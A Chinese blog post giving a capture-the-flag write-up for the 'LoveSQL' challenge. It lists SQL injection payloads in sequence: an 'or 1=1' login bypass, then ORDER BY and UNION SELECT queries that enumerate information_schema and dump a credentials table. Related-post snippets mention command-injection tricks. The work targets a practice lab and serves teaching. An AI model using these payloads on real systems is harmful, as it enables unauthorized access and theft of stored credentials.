首页 > 数据库 >[极客大挑战 2019]LoveSQL 1

[极客大挑战 2019]LoveSQL 1

时间:2023-10-04 10:33:48浏览次数:58  
标签:极客 group union geek LoveSQL 2019 l0ve1ysq1 payload select

原理

常规注入

解题过程

进入登录界面,还是使用万能登录试一试

payload:1' or 1=1#

没想到成功了,说明字符型注入使用的'爆出的密码应该是MD5加密,爆破很麻烦,试试常规注入

payload:1' order by 4#
payload:1' order by 3#
找出列项

payload:1' union select 1,database(),3#
找出数据库名 geek

payload:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='geek';#
找出表名为:geekuser  l0ve1ysq1

payload:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1';#
找出字段名:id,username,password

payload:1' union select 1,group_concat(id,username,password),3 from geek.l0ve1ysq1;#
爆出flag

标签:极客,group,union,geek,LoveSQL,2019,l0ve1ysq1,payload,select
From: https://www.cnblogs.com/BEONTHE/p/17741999.html

相关文章

  • [极客大挑战 2019]Secret File
    原理抓包工具的使用解题过程进入靶场,什么也没看出来,老规矩查看页面源代码,发现个php文件,那就点开试试又有一个php文件,再点开却啥也没有,那就抓个包看看因为肯定发生了跳转,明明请求的是action.php却变成了end.php果然抓到了。那就继续访问secr3t.php发现了文件包含,没过......
  • [SUCTF 2019]EasySQL 1
    原理||的不同功能,连接字符串和或堆叠注入解题过程进入靶场,按常规进行注入,发现过滤了很多关键字,跑一下fuzz试试堆叠注入payload:1;showtables;得出放flag的表,但flag字段被过滤了。看wp原代码查询语句是select$_POST['query']||0fromflag;但我们不知道源码....从尝试......
  • [GXYCTF2019]Ping Ping Ping 1
    原理RCE命令执行的多种绕过姿势解题过程进入靶场提示要传递参数ip那就传递一下127.0.0.1,结果正常试试进行拼接,试了127.0.0.1&&ls或者127.0.0.1&ls都不行,,,直到用;做连接符才可以payload:127.0.0.1;ls发现有index.php和flag.php文件,猜测flag应该在flag.php内接着尝试读取......
  • 题目:2019年5月发布的四川旅游国际形象
    问题:2019年5月发布的四川旅游国际形象新标识中的动物元素是()。A.小熊猫B.大熊猫C.金丝猴参考答案如下,发送题目到公众号学哈,自动回复答案解析:四川旅游国际形象新标识于2019年5月发布,其中的动物元素是大熊猫(选项B)。大熊猫是四川的特有物种,也是中国的国宝之一,因此在四川旅游形象标识中......
  • APIO2019 桥梁
    Day\(\mathbb{Z}(\text{Ni})\)。想成kruskal重构树后就再也不会了。考虑没有修改怎么做,将所有边和询问按照权值从大到小排序,对于一个询问\((s,w)\),向并查集中插入所有边权\(\gew\)的边,维护连通块大小即可。现在有了修改,考虑对询问修改分块。设每\(B\)个询问修改重构一......
  • BUUOJ[极客大挑战 2019]Havefun 1
    原理url参数的传递页面原代码的查看解题过程进入靶场没看到什么有用的东西,那就得看页面源代码了,一般都有提示果然,让我们传递值为dog的cat参数,试一下payload:?cat=dog爆出flag......
  • BUUOJ[极客大挑战 2019]EasySQL 1
    原理涉及sql注入的or万能登录解题过程看到题目名字,应该就是要用到sql注入了,进入网页,看到了要登陆,我一开始想到要爆破(呃呃呃)。要用sql去登录的话,就要想到or万能登录了payload:1'or1=1#账号密码都是字符型的注入,因此有时候需要尝试一下'和"接着就爆出flag了另外,我在url......
  • 升级Lync Server 2013到Skype for Business 2019(一)
    写在前面从本章起,我们将介绍如何使用迁移升级的方式,将LyncServer2013升级至SkypeforBusines2019。由于案例来自于真实场景,所以其中包含了详细的可落地的升级步骤,以及真实环境配置。升级背景由于SkypeforBusiness2019将不再支持持久聊天服务器(PersistentChatServer),那么......
  • 洛谷 P5811 - [IOI2019] 景点划分
    小清新构造题。不妨假设\(a\leb\lec\)。显然我们会让大小为\(a,b\)的部分连通,这样肯定是不劣的。建出DFS树,考虑其重心\(r\),如果\(r\)的某个子树大小\(\gea\),我们在这个子树内挑一个大小为\(a\)的连通块,在抠掉这个子树之外的部分挑一个大小为\(b\)的连通块即可。......
  • P5682 [CSP-J 2019] 次大值
    题目描述传送门Alice有\(n\)个正整数,数字从\(1\simn\)编号,分别为\(a_1,a_2,\dots,a_n\)。Bob刚学习取模运算,于是便拿这\(n\)个数进行练习,他写下了所有\[a_i\bmoda_j(1\lei,j\len\wedgei\neqj)\]的值,其中\(\bmod\)表示取模运算。Alice想知道所有......